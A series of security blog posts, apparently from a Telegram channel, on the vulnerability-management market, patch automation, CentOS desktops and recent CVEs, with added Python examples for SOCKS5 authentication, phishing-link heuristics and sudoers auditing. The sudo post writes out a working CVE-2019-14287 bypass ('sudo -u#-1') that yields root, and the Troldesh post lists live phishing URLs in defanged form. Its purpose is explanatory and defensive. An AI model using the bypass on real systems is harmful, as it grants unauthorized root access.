The news that Rostelecom (Solar) will begin to provide Qualys Vulnerability Management services (rus) probably doesn't mean much on a global scale, but it's quite interesting for the Russian market and for the markets of other "countries with strict data sovereignty rules".
What problems do we have with global cloud-based security solutions, including Vulnerability Management solutions? When the data about vulnerabilities of Russian organizations is stored and processed somewhere abroad, and it is not clear how and by whom (even if we are not talking about real threats), it is a red flag for government regulators like FSTEC. And they can easily make the usage of such services VERY complicated, at least among the customers that are somehow related to the government. The same restrictions stimulate the development of local security products; that's why we have local players on the Russian #VulnerabilityManagement market, like Positive Technologies, Altx-Soft, NPO Echelon, etc.
BUT when a foreign security vendor delivers its solution in the form of a Private Cloud through the largest Russian service provider, which also has the Russian state as its main shareholder, it is a different story. Data will be stored and processed in Russia, and the US vendor only updates the cloud platform, so what's the problem? If needed, Rostelecom has enough resources to get all the necessary certificates for this cloud service, and may re-label it as its own.
Currently it is not clear how much the offer from #Rostelecom will differ from the standard #Qualys services. Details of the deal are not publicly known. Will Rostelecom pay Qualys a fixed amount and then try to monetize it? Will Qualys and Rostelecom share money from the actual customers somehow? Will Qualys pay Rostelecom for hosting, and the money from customers will go directly to Qualys? It's unclear now. Most likely option 1 or 2, but they could agree on very different terms. 🙂
But in any case, the domestic Russian Vulnerability Management market might be shaken. And I think it's great. At least for the end-users. 🙂 And when Tenable someday releases its own Private Cloud with Tenable.io, it will be even better. 😉
H.R.2810 - National Defense Authorization Act for Fiscal Year 2018. IMHO, it's a great lesson for any foreign cybersecurity vendor who wants to work in the free and completely competitive US market. 😏 No matter how many Transparency Centers you open and how global you are, it will be possible to label you as 'Evil Russians' (or Chinese, Iranians, Koreans, whatever) and ban you without any real evidence. IMHO, this is nothing more than lobbying and protectionism. #kaspersky
I decided to publish my simple console Password Manager. I called it barapass (github). I've been using it for quite some time on Linux and on Windows (in WSL). It will probably also work natively on Windows and macOS with minimal fixes, but I haven't tried it yet.
I've also described in my blog:
* Why do people use password managers?
* How to use barapass? (installation, encrypting and decrypting files, searching in an encrypted file)
* Is it safe to copy passwords to clipboard?
Read here: https://avleonov.com/2019/09/17/barapass-console-password-manager/
#barapass #concept #AES #CLI #crypto #Linux #password #python #python3 #WSL #xclip
Hi guys! You are not my personal army, but can I ask you to vote for me ("Александр Леонов aka Беспощадный Эксперт") below? 🙂
One of the best satirical Telegram channels about the Russian Information Security community organizes "voting battles" between security bloggers, speakers and well-known company leaders. For some reason they put me there as well. 😅 Unlike most "participants", who just ignore all this mess, I find this a fun and completely free way to promote what I do. So, please vote for me and ask your friends to vote as well! 🗳✌️
And if you speak Russian, subscribe to @rusecmedia, some of their jokes are just hilarious.
Forwarded from rusecmedia
For a long time we couldn't get Alexander to come; he says he was away on a blogger's business trip around Facebook.
Forwarded from rusecmedia
Who will win?
Anonymous Poll
65% Александр Леонов aka Беспощадный Эксперт
35% Дмитрий Мананников aka BLOG KILLER
It's not so obvious that SOCKS servers with authentication are a necessary thing:
1. You can run a "local SOCKS service" simply by connecting to a remote host via ssh (with -D <port>).
2. Most software products that support SOCKS don't support SOCKS servers with authentication.
The last fact I find very unfortunate, because using SOCKS without having to keep an eye on an ssh connection is much more comfortable. But if the software actually supports SOCKS with authentication, you can try the Dante server.
Here's how to install and configure it on CentOS 7: https://avleonov.com/2019/09/23/dante-socks5-server-with-authentication
#CentOS #Dante #SOCKS #SOCKS5
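To make point 2 concrete, here is an added example (not code from the post or from Dante) of the two handshakes a SOCKS client needs in order to talk to a server that insists on username/password authentication: the method negotiation from RFC 1928 and the sub-negotiation from RFC 1929, as byte-level functions for both sides. The credential table and the user "alice" are constructed.

```python
# Added example (not from the post): the SOCKS5 method negotiation (RFC 1928)
# and the username/password sub-negotiation (RFC 1929) that a client must
# implement to use a server such as Dante configured for username auth.
# Pure byte-level logic, no sockets; the credential table is constructed.
import hmac

SOCKS_VERSION = 0x05
METHOD_NO_AUTH = 0x00
METHOD_USERPASS = 0x02
METHOD_NONE_ACCEPTABLE = 0xFF
USERPASS_VERSION = 0x01
CREDENTIALS = {"alice": "s3cret-pass"}  # constructed; a real server stores hashes


def client_greeting(methods):
    """Client -> server: VER | NMETHODS | METHODS."""
    return bytes([SOCKS_VERSION, len(methods), *methods])


def server_select_method(greeting, require_auth=True):
    """Server -> client: VER | METHOD. A server requiring authentication answers
    0xFF when only 'no auth' (0x00) is offered: that is how auth-unaware clients fail."""
    if len(greeting) < 2 or greeting[0] != SOCKS_VERSION:
        raise ValueError("not a SOCKS5 greeting")
    nmethods = greeting[1]
    offered = greeting[2:2 + nmethods]
    if len(offered) != nmethods:
        raise ValueError("truncated method list")
    if METHOD_USERPASS in offered:
        chosen = METHOD_USERPASS
    elif METHOD_NO_AUTH in offered and not require_auth:
        chosen = METHOD_NO_AUTH
    else:
        chosen = METHOD_NONE_ACCEPTABLE
    return bytes([SOCKS_VERSION, chosen])


def client_userpass_request(username, password):
    """Client -> server: VER | ULEN | UNAME | PLEN | PASSWD (RFC 1929)."""
    u, p = username.encode(), password.encode()
    if not (1 <= len(u) <= 255 and 1 <= len(p) <= 255):
        raise ValueError("username and password must be 1..255 bytes")
    return bytes([USERPASS_VERSION, len(u)]) + u + bytes([len(p)]) + p


def server_verify_userpass(request):
    """Server -> client: VER | STATUS (0x00 = success); also returns the user or None."""
    fail = (bytes([USERPASS_VERSION, 0x01]), None)
    if len(request) < 2 or request[0] != USERPASS_VERSION:
        return fail
    ulen = request[1]
    if len(request) < 3 + ulen:  # need the full UNAME plus the PLEN byte
        return fail
    name = request[2:2 + ulen].decode(errors="replace")
    plen = request[2 + ulen]
    passwd = request[3 + ulen:3 + ulen + plen]
    if len(passwd) != plen:
        return fail
    expected = CREDENTIALS.get(name)
    # Constant-time comparison so a wrong password does not leak via timing.
    if expected is not None and hmac.compare_digest(passwd, expected.encode()):
        return bytes([USERPASS_VERSION, 0x00]), name
    return fail


def negotiate(methods, username=None, password=None):
    """Run the whole handshake in memory and describe the outcome."""
    reply = server_select_method(client_greeting(methods))
    if reply[1] == METHOD_NONE_ACCEPTABLE:
        return "rejected: no acceptable authentication method"
    if reply[1] == METHOD_USERPASS:
        status, user = server_verify_userpass(client_userpass_request(username, password))
        return f"authenticated as {user}" if status[1] == 0x00 else "authentication failed"
    return "accepted without authentication"
```

A client that only ever offers method 0x00 gets the 0xFF reply and never reaches the CONNECT request, which is the failure you see when auth-unaware software is pointed at an authenticating server.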
Pretty nice GUI feature in the latest #Nessus Professional 8.7.0. Now you can select a host or hosts in the scan results and create a new scan based on a different Scan Template/Policy. For example, you can perform a fast discovery scan, filter some hosts and then scan them deeply with authentication. Other features of this release are about Nessus Manager and Essentials, so not very interesting for me. 🙂 #Tenable
Features in the GUI are certainly pleasant, but the real game changer in Vulnerability Management, IMHO, will be automated patching for a reasonable price. It is much better when you do not just say that some systems are vulnerable but fix these problems with one click. At least most of them.
So, it's great that some VM vendors work on this. For example, 2 weeks ago #Qualys released a new 1.3 version of the Patch Management module. It seems from the list of changes that they understand: Windows patching is not only about the actual installation of the patches. It is also about:
- Catching the right time for patching. Now in Qualys you can choose "None" for Patch Window and install the emergency patch as soon as possible; patches can also be pre-downloaded before the job starts to save some time.
- Changes in the registry and other reconfigurations.
- Reboots. Now in Qualys you can suppress reboot notification and reboot the host immediately after the patch deployment.
These are steps in the right direction.
The main thing that upsets me in #CentOS8 (that was finally released 4 days ago) is the lack of alternative desktop environments in repositories, even in EPEL. There is only a sloooow Gnome 3 with terrible junk animations that I REALLY hate. 😢
And now I am thinking about what is better: to put up with Gnome (at least for a while) and patiently wait for my favourite #XFCE in EPEL (there is a request for this), to install XFCE from source (it seems difficult), or to try to install some other minimalistic DE from source... 🤔
I doubt that there are many people who use #CentOS as a Desktop OS, but if there are any, I would be happy to hear your opinion at https://t.iss.one/avleonovchat.
I just saw a nice post by #JSOC (in Russian) about the new version of the #Troldesh cryptolocker cyberattack. This time the attackers use legitimate but compromised #WordPress websites in phishing.
The links look pretty normal:
Horsesmouth[.]org/wp-content/themes/InspiredBits/images/dummy/doc/doc/
www.montessori-academy[.]org/wp-content/themes/campus/mythology-core/core-assets/images/social-icons/long-shadow/doc/
chestnutplacejp[.]com/wp-content/ai1wm-backups/doc/
Since these sites are legit and have a good reputation, it's quite difficult to detect and block emails with such links.
This is another good reason to update a vulnerable CMS as soon as possible, since the malware distribution can be even more dangerous for your business than the compromise of the site itself.
#cryptolocker #phishing
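Since domain reputation does not help here, one defensive angle is to look at where inside the site the link points. The following is an added example (not JSOC's or anyone's production rule) of a path-structure heuristic built from the three links above; the directory and suffix lists are my assumptions for illustration.

```python
# Added example (not from the JSOC post): a path-structure heuristic for phishing
# links hosted on compromised but reputable WordPress sites, as in the Troldesh
# campaign above. Domain reputation passes such links, so this inspects where in
# the site the payload sits. Sample links are the three from the post (defanged);
# the indicator lists are an assumption for illustration, not a published rule.
from urllib.parse import urlsplit

# WordPress directories that should serve themes, plugins or backups, not documents.
WP_CONTENT_DIRS = ("/wp-content/themes/", "/wp-content/plugins/", "/wp-content/ai1wm-backups/")
DOC_DROP_TAILS = ("/doc/", "/docs/", "/download/")

SAMPLE_LINKS = [  # from the post, defanged
    "Horsesmouth[.]org/wp-content/themes/InspiredBits/images/dummy/doc/doc/",
    "www.montessori-academy[.]org/wp-content/themes/campus/mythology-core/core-assets/images/social-icons/long-shadow/doc/",
    "chestnutplacejp[.]com/wp-content/ai1wm-backups/doc/",
]


def score_link(url):
    """Return the reasons a link looks like a payload parked inside a WordPress
    install; an empty list means the heuristic sees nothing unusual."""
    target = url.replace("[.]", ".")  # refang so urlsplit can parse it
    if "://" not in target:
        target = "http://" + target
    path = urlsplit(target).path
    wp_dir = next((d for d in WP_CONTENT_DIRS if d in path), None)
    if wp_dir is None:
        return []
    reasons = []
    if path.endswith(DOC_DROP_TAILS):
        reasons.append("document-drop directory inside " + wp_dir.strip("/"))
    if "ai1wm-backups" in path:
        reasons.append("backup plugin directory exposed over the web")
    # A theme or plugin asset on its own is normal traffic, so wp_dir alone is not a reason.
    return reasons


def is_suspicious(url):
    """True when at least one reason fires; feed this to your mail filter's URL hook."""
    return bool(score_link(url))
```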
Continuing the topic about the Qualys PM feature, I REALLY want to see the universal fully automated #PatchManagement (and therefore #VulnerabilityManagement), but I DON'T think we are close to that.
1. It is difficult to formalize all the steps that are necessary for patching. There are thousands of third-party software products (especially for Windows desktops). Even getting information about all the vulnerabilities in all these products is hard, getting actionable and formal remediation instructions for them is even harder, and it's almost impossible to follow these instructions automatically and reliably.
2. Patches sometimes break systems. It just happens. In a common human-driven process, there will always be a responsible person, who has not performed all necessary tests before actual patching and has not discussed the possible consequences with the system owner. In a fully automated process, you only have a PM product and the vendor who does not guarantee anything.
Due to the problems of automated Vulnerability Remediation, it seems that currently #VulnerabilityManagement and #PatchManagement vendors mainly focus on the hosts:
1) that are not very important, so the unsuccessful update won't become a complete disaster;
2) where the update operation is quite complicated.
It seems a bit foolish to offer automated remediation for the systems where almost everything can be updated with a single command from #WSUS or a Linux repository. However, in the case of Linux, there will be software installed from source, self-built packages, and other complexities. And that's without even talking about #Docker. 🤯
So, it turns out that the most convenient option for vendors is to focus on Windows desktops. And not for all programs, but only for a specific list (clarify this to avoid surprises!).
Plus, the trigger and responsibility are still in the hands of IT administrators. 😉
Such "automated remediation" off-the-shelf solutions can be successfully presented on the market right now.
Adobe is deactivating all accounts and cancelling all subscriptions in Venezuela to comply with U.S. Government Executive Order (issued with no expiration date). There will be no refunds! Yep, they block the accounts of ordinary people, who bought the damn Photoshop. Isn't this an example of REAL piracy from well-known "piracy"-fighters? 😏
The sad reality is that even in the case of "private clouds", no one can be protected from such political decisions. Does this mean that import substitution and protectionism are good for the country and people? Well, not really. I believe that only a free competitive market provides good products. But, as we can see, it may be practical. 😕 At least, it is much better than to face such unfriendly unilateral actions unprepared and not to have any alternatives.
It's a little bit sad that there are no more vendors with Russian roots in Gartner 2019 MQs for AST and WAF. #PositiveTechnologies were added in MQ for AST in 2018 and excluded in 2019 with a standard comment "were dropped based on our inclusion and exclusion criteria" (as well as SiteLock and Trustwave). Positive Technologies were also in MQ for WAF in 2017 and probably excluded in 2018 (I didn't track this one). Earlier in MQs were #ERPScan (AST MQ 2017) and #Wallarm (mentioned, but not included in WAF MQ 2017).
Do you need #CentOS8 with #IceWM as desktop Operating System? Most likely not. Especially if you want it to work smoothly without any worries and troubles. However, if you enjoy playing with new desktop environments, you might find it fun.
My reasons were as follows:
1. I wanted to use the same Linux distribution for server and desktop. Just to minimize possible surprises during the deployment.
2. I wanted to know what is going on in the RPM-based part of the Linux world. The only way to achieve this is to use such a distribution every day.
3. I was tired of problems with the VirtualBox guest additions in #CentOS 7 (yes, I run it all as a virtual machine), especially after the 3.10 kernel updates. It was time to move on.
4. I didn't want to use #Gnome3, because it’s slow and ugly (however it’s fully functional!). And there were no other DEs in CentOS 8 repositories at that time.
Read here: https://avleonov.com/2019/10/14/centos-8-with-icewm-desktop-environment/
A nice, but not very practical bug in #sudo, CVE-2019-14287. Let's say I created a temp user:
# useradd temp
# passwd temp
And in /etc/sudoers I forbade him to run /usr/bin/id as root:
temp ALL=(ALL, !root) /usr/bin/id
Then I log in as the temp user:
# su temp
I can run /usr/bin/id as the temp user:
$ /usr/bin/id
uid=1002(temp) gid=1002(temp) groups=1002(temp)
I can't run it as root with sudo:
$ sudo /usr/bin/id
Sorry, user temp is not allowed to execute '/usr/bin/id' as root on DESKTOP-DA27N5I.localdomain.
BUT if I set a special user id (-1 or 4294967295), I actually CAN run it as root with sudo (it's a bug!):
$ sudo -u#-1 /usr/bin/id
uid=0(root) gid=1002(temp) groups=1002(temp)
^- we see that it was really executed as root with uid 0.
Yep, this one is funny. CVE-2019-16278 is a fresh 0day RCE in the open-source #Nostromo web server (versions <= 1.9.6) through directory traversal. This bug is due to an incomplete fix for CVE-2011-0751: "we can bypass a check for /../". It was discovered 8 years (!!!) later. Ha! 😀
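Back to the sudo bug: the precondition is a Runas list written as "everyone except root", like the temp rule above, so the useful defensive check is to find such rules in sudoers. Here is an added example (not from the post or the sudo project) that does that over a constructed sudoers sample.

```python
# Added example (not from the post): audit sudoers rules for the Runas_Spec
# pattern behind CVE-2019-14287, a negated entry such as (ALL, !root) meaning
# "any user except root". On unpatched sudo such a rule is what "-u#-1" walks
# around, so these are the rules to find and rewrite as an explicit allow-list.
# The sample rules are constructed, not taken from a real system.
import re

SAMPLE_SUDOERS = """\
# constructed sample
Defaults    env_reset
root        ALL=(ALL:ALL) ALL
%wheel      ALL=(ALL) ALL
temp        ALL=(ALL, !root) /usr/bin/id
deploy      ALL=(www-data) NOPASSWD: /usr/bin/systemctl restart app
backup      ALL=(ALL, !root, !#0) /usr/bin/rsync
"""

RUNAS_RE = re.compile(r"=\(([^)]*)\)")  # the (Runas_List) part of a user spec


def negated_runas_rules(sudoers_text):
    """Return (line_no, user, negated_entries) for every rule whose Runas user
    list contains a '!' entry. Rules without a Runas list or without negation
    are ignored; so are comments, blank lines and Defaults."""
    findings = []
    for line_no, raw in enumerate(sudoers_text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        match = RUNAS_RE.search(line)
        if not match:
            continue
        # Runas_Spec is "users[:groups]"; only the user part matters here.
        runas_users = match.group(1).split(":", 1)[0]
        negated = [e.strip() for e in runas_users.split(",") if e.strip().startswith("!")]
        if negated:
            findings.append((line_no, line.split()[0], negated))
    return findings
```

Rules this reports should be rewritten to name the allowed target users explicitly, which also holds on a patched sudo, where negation in a Runas list is still a weak way to express intent.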
What is better: homegrown custom Vulnerability Scanning automation or commercial Perimeter Scanning Service (Threat Intelligence Platform)?
There are two main issues that each Vulnerability Scanning vendor faces:
1. What to scan. If you (as a vendor) want to provide your Threat Intelligence feed automatically, you have to know what to scan without asking your customers. Even inside a big organization, where people can make integrations with various IT data sources, it's not so obvious what to scan! Of course, you can get some targets using known IP ranges, domain names, connected websites, etc. But, most likely, you will miss something important and/or add unrelated trash. Thus, there will be many false positives and false negatives in your report.
2. Actual scanning. You can make an aggressive full-scan and your scanner will be blocked or will affect the targets negatively. Or you can scan only the most popular ports and miss something important. In both cases, the scan result won't be good enough.